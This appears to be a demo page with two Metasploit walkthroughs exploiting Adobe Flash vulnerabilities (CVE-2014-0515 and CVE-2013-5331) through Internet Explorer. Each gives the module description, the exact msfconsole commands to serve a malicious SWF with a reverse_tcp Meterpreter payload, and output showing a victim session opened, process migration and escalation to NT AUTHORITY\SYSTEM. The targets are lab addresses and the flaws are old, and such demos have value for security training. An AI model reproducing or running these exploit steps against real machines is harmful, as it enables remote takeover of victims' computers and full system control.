Metasploit CVE-2014-0515 Demo

Description:
This module exploits a buffer overflow vulnerability in Adobe Flash
Player. The vulnerability occurs in the flash.Display.Shader class,
when setting specially crafted data as its bytecode, as exploited in
the wild in April 2014. This module has been tested successfully on
IE 6 to IE 10 with Flash 11 and Flash 12 over Windows XP SP3,
Windows 7 SP1 and Windows 8.

References:
http://cvedetails.com/cve/2014-0515/
http://www.securityfocus.com/bid/67092
http://helpx.adobe.com/security/products/flash-player/apsb14-13.html
http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks
http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/

use exploit/windows/browser/adobe_flash_pixel_bender_bof
set SRVHOST 192.168.2.23
set SRVPORT 80
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.23
exploit

[*] Started reverse handler on 192.168.2.23:4444
[*] Using URL: http://192.168.2.23:80/2014-0515
[*] Server started.
[*] 192.168.2.25 adobe_flash_pixel_bender_bof – Gathering target information.
[*] 192.168.2.25 adobe_flash_pixel_bender_bof – Sending response HTML.
[*] 192.168.2.25 adobe_flash_pixel_bender_bof – Request: /2014-0515/RKdcju/
[*] 192.168.2.25 adobe_flash_pixel_bender_bof – Sending HTML…
[*] 192.168.2.25 adobe_flash_pixel_bender_bof – Request: /2014-0515/RKdcju/bEonsn.swf
[*] 192.168.2.25 adobe_flash_pixel_bender_bof – Sending SWF…
[*] Sending stage (770048 bytes) to 192.168.2.25
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.25:2915) at 2014-05-15 18:56:16 -0400
[*] Session ID 1 (192.168.2.23:4444 -> 192.168.2.25:2915) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: iexplore.exe (2120)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2180
[+] Successfully migrated to process

sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: VICTIM-PC\victim
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Metasploit CVE-2013-5331 Demo

Description:
This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170.

References:
http://helpx.adobe.com/security/products/flash-player/apsb13-28.html
http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html

*Commands are bold.

use exploit/windows/browser/adobe_flash_filters_type_confusion
set SRVHOST 192.168.2.23
set SRVPORT 80
set URIPATH 2013-5331
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.2.23
exploit
[*] Exploit running as background job.
msf exploit(adobe_flash_filters_type_confusion) >
[*] Started reverse handler on 192.168.2.23:4444
[*] Using URL: http://192.168.2.23:80/2013-5331
[*] Server started.
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Gathering target information.
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Sending response HTML.
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Request: /2013-5331/GzqJRB/
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Sending HTML…
[*] 192.168.2.25 adobe_flash_filters_type_confusion – showme the money
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Request: /2013-5331/GzqJRB/jUBO.swf
[*] 192.168.2.25 adobe_flash_filters_type_confusion – Sending SWF…
[*] Sending stage (769536 bytes) to 192.168.2.25
[*] Meterpreter session 1 opened (192.168.2.23:4444 -> 192.168.2.25:1096) at 2014-04-30 20:03:46 -0400
[*] Session ID 1 (192.168.2.23:4444 -> 192.168.2.25:1096) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: iexplore.exe (2392)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2888
[+] Successfully migrated to process
sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: VICTIM-PC\victim
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM